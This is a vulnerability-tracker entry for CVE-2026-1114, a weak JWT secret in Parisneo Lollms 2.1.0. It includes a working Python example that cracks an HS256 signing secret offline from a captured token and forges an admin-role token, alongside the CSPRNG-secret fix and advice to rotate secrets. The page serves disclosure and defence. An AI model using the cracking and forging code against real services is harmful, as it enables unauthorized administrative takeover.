Parisneo Lollms

1 CVE tracked for this product


CVE-2026-1114 (CRITICAL, Act Now)

JWT secret key brute-forcing in Parisneo Lollms 2.1.0 allows unauthenticated remote attackers to forge administrative tokens and achieve full system compromise. The application signs its JSON Web Tokens with a weak secret, so an attacker who obtains any token signed by the server can recover the signing secret offline by testing candidate secrets against that token's signature, then mint tokens carrying administrator-level claims that the server accepts as genuine. With a CVSS base score of 9.8 (network-reachable, low complexity, no privileges or user interaction required) and no EPSS score published at the time of analysis, this is a severe authentication bypass in AI/LLM management software. Fixed in version 2.2.0. No public exploit was identified at the time of analysis, though the technique (offline JWT secret cracking) is well documented and needs no application-specific tooling. Because the weakness lies in the secret rather than in the verification code, administrators should also rotate the signing secret after upgrading: any token forged before the fix stays valid for as long as the old secret is still accepted, and rotating it invalidates existing sessions along with any forged ones.
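The attack the description refers to, as an added example that is not code from the Lollms project or from this page: an HS256 token is captured (any low-privilege user's own session token will do), the secret is recovered offline by testing candidate strings against the token's own signature, and the same claims are re-signed with an administrative role. The claim name `role`, the sample claims and the candidate wordlist are constructed for illustration; how Lollms actually encodes privilege in its tokens is not stated on this page. `generate_secret` shows the fix: a 256-bit secret drawn from the OS CSPRNG, against which the same wordlist attack finds nothing.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Iterable, Optional


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _json_segment(obj: dict) -> str:
    return _b64url_encode(json.dumps(obj, separators=(",", ":"), sort_keys=True).encode())


def _hs256(signing_input: bytes, secret: str) -> bytes:
    return hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()


def make_jwt(claims: dict, secret: str) -> str:
    """Issue an HS256 JWT the way an application signing sessions would."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = f"{_json_segment(header)}.{_json_segment(claims)}"
    return f"{signing_input}.{_b64url_encode(_hs256(signing_input.encode(), secret))}"


def verify_jwt(token: str, secret: str) -> dict:
    """Server-side check: pin the algorithm and compare the MAC in constant time."""
    header_b64, claims_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = _hs256(f"{header_b64}.{claims_b64}".encode(), secret)
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(_b64url_decode(claims_b64))


def crack_secret(token: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline attack: the captured token is its own oracle, so the server sees nothing."""
    header_b64, claims_b64, sig_b64 = token.split(".")
    signing_input = f"{header_b64}.{claims_b64}".encode()
    target = _b64url_decode(sig_b64)
    for guess in candidates:
        if _hs256(signing_input, guess) == target:
            return guess
    return None


def forge_admin_token(token: str, secret: str) -> str:
    """Re-sign the captured claims with the recovered secret and an escalated role."""
    claims = json.loads(_b64url_decode(token.split(".")[1]))
    claims["role"] = "admin"  # assumption: privilege is carried in a 'role' claim
    return make_jwt(claims, secret)


def generate_secret() -> str:
    """The fix: 256 bits from the OS CSPRNG, never a default or a human-chosen word."""
    return secrets.token_urlsafe(32)


# Constructed wordlist standing in for a rockyou-style candidate list.
CANDIDATES = ["password", "123456", "changeme", "secret", "lollms", "admin"]


if __name__ == "__main__":
    # Constructed sample: a low-privilege session signed with a guessable secret.
    weak_token = make_jwt({"sub": "alice", "role": "user"}, "secret")
    recovered = crack_secret(weak_token, CANDIDATES)
    print("recovered secret:", recovered)
    forged = forge_admin_token(weak_token, recovered)
    print("forged token verifies as:", verify_jwt(forged, recovered))
    strong_token = make_jwt({"sub": "alice", "role": "user"}, generate_secret())
    print("wordlist against random secret:", crack_secret(strong_token, CANDIDATES))
```

Against a real target the candidate list would be a large wordlist fed to hashcat mode 16500 or jwt_tool rather than a Python loop, but the logic is identical: the cost of the attack is entirely the entropy of the secret, which is why the fix is a random secret rather than a change to the verification code.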

Tags: AI / ML, JWT Attack, Privilege Escalation, Parisneo Lollms
Sources: NVD, GitHub
CVSS 3.0: 9.8 (CRITICAL)
EPSS: 0.0% (no score published at time of analysis)

